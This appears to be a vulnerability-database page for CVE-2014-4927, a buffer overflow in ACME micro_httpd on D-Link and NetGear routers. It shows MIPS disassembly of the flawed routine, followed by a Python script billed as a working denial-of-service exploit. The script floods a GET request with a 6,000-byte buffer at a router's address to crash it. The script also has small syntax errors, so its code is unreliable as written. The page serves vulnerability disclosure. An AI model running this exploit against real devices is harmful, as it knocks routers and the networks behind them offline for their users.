ACME micro_httpd Denial Of Service

🗓️ 19 Jul 2014 00:00:00Reported by Yuval tisf NativType

packetstorm🔗 packetstormsecurity.com👁 41 Views

Buffer Overflow in micro_httpd by ACME, Denial Of Servic

Reporter	Title	Published	Views	Family All 11
0day.today	ACME micro_httpd - Denial of Service	18 Jul 201400:00	–	zdt
CVE	CVE-2014-4927	24 Jul 201414:00	–	cve
Cvelist	CVE-2014-4927	24 Jul 201414:00	–	cvelist
Exploit DB	ACME micro_httpd - Denial of Service	18 Jul 201400:00	–	exploitdb
exploitpack	ACME micro_httpd - Denial of Service	18 Jul 201400:00	–	exploitpack
NVD	CVE-2014-4927	24 Jul 201414:55	–	nvd
OSV	UBUNTU-CVE-2014-4927	24 Jul 201414:55	–	osv
Prion	Buffer overflow	24 Jul 201414:55	–	prion
Positive Technologies	PT-2014-6212 · NetGear +2 · Netgear Mr-Adsl-Dg834 +4	24 Jul 201400:00	–	ptsecurity
UbuntuCve	CVE-2014-4927	24 Jul 201414:55	–	ubuntucve

`"""  
# Exploit Title: Buffer Overflow in micro_httpd by ACME  
# Date: 4/7/2014  
# Exploit Author: Yuval tisf Nativ  
# Vendor Homepage: http://www.acme.com/software/micro_httpd/  
# Software Link: http://www.acme.com/software/micro_httpd/  
# Version: June 2012  
# CVE: CVE-2014-4927  
# Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)  
  
Buffer Overflow in micro_httpd  
  
Argument for GET method is vulnerable to a buffer overflow.  
Analyzed on:  
D-Link: DSL2750U, DSL2740U,  
NetGear: WGR614, MR-ADSL-DG834  
  
ACME Labs offer no version tracking on server versions so version might not  
be accurate.  
  
Disassmebly in MIPS of vulnerable flow:  
sub_4067CC:  
  
LOAD:004067CC  
LOAD:004067CC lui $gp, 0x47  
LOAD:004067D0 addiu $sp, -0xA0  
LOAD:004067D4 li $gp, 0x46B850  
LOAD:004067D8 sw $ra, 0xA0+var_4($sp)  
LOAD:004067DC sw $s3, 0xA0+var_8($sp)  
LOAD:004067E0 sw $s2, 0xA0+var_C($sp)  
LOAD:004067E4 sw $s1, 0xA0+var_10($sp)  
LOAD:004067E8 sw $s0, 0xA0+var_14($sp)  
LOAD:004067EC sw $gp, 0xA0+var_88($sp)  
LOAD:004067F0 lui $s0, 0x46  
LOAD:004067F4 lw $v1, dword_464108  
LOAD:004067F8 lw $t9, (off_463B24 - 0x46B850)($gp)  
LOAD:004067FC move $v0, $a0  
LOAD:00406800 sw $a1, 0xA0+var_90($sp)  
LOAD:00406804 move $s2, $a2  
LOAD:00406808 lui $a1, 0x44  
LOAD:0040680C lui $a2, 0x44  
LOAD:00406810 move $a0, $v1  
LOAD:00406814 la $a1, aSDS # "%s %d %s\r\n"  
LOAD:00406818 la $a2, aHttp1_1 # "HTTP/1.1"  
LOAD:0040681C move $s1, $a3  
LOAD:00406820 jalr $t9  
LOAD:00406824 move $a3, $v0  
LOAD:00406828 lw $gp, 0xA0+var_88($sp)  
LOAD:0040682C lw $a0, dword_464108  
LOAD:00406830 lw $t9, (off_463B24 - 0x46B850)($gp)  
LOAD:00406834 lui $a2, 0x44  
LOAD:00406838 lui $a1, 0x44  
LOAD:0040683C la $a2, aMicro_httpd # "micro_httpd"  
LOAD:00406840 jalr $t9  
LOAD:00406844 la $a1, aServerS # "Server: %s\r\n"  
LOAD:00406848 lw $gp, 0xA0+var_88($sp)  
LOAD:0040684C lw $a1, 0x4108($s0)  
LOAD:00406850 lw $t9, (off_463BCC - 0x46B850)($gp)  
LOAD:00406854 lui $a0, 0x44  
LOAD:00406858 jalr $t9  
LOAD:0040685C la $a0, aCacheControlNo # "Cache-Control:  
no-cache\r\n"  
LOAD:00406860 lw $gp, 0xA0+var_88($sp)  
LOAD:00406864 move $a0, $0  
LOAD:00406868 lw $t9, (off_463CDC - 0x46B850)($gp)  
LOAD:0040686C jalr $t9  
LOAD:00406870 addiu $s3, $sp, 0xA0+var_7C  
LOAD:00406874 lw $gp, 0xA0+var_88($sp)  
LOAD:00406878 addiu $a0, $sp, 0xA0+var_80  
LOAD:0040687C lw $t9, (off_463DF4 - 0x46B850)($gp)  
LOAD:00406880 jalr $t9  
LOAD:00406884 sw $v0, 0xA0+var_80($sp)  
LOAD:00406888 lw $gp, 0xA0+var_88($sp)  
LOAD:0040688C lui $a2, 0x44  
  
  
  
Working Exploit for a Denial of Service:  
"""  
  
#!/bin/python  
import socket  
import struct  
  
# This will crash the router.  
# In some devices it takes about 10 minutes until functionality is  
restored.  
  
buffer = "\x41" * 6000 # Original fuzzing buffer.  
host = "10.0.0.138"  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, 80))  
  
payload = GET /" + buffer + " HTTP/1.1\r\n"  
payload += ("Host: %s \r\n\r\n", % host)  
  
s.send(payload)  
s.close()  
  
`

19 Jul 2014 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.17507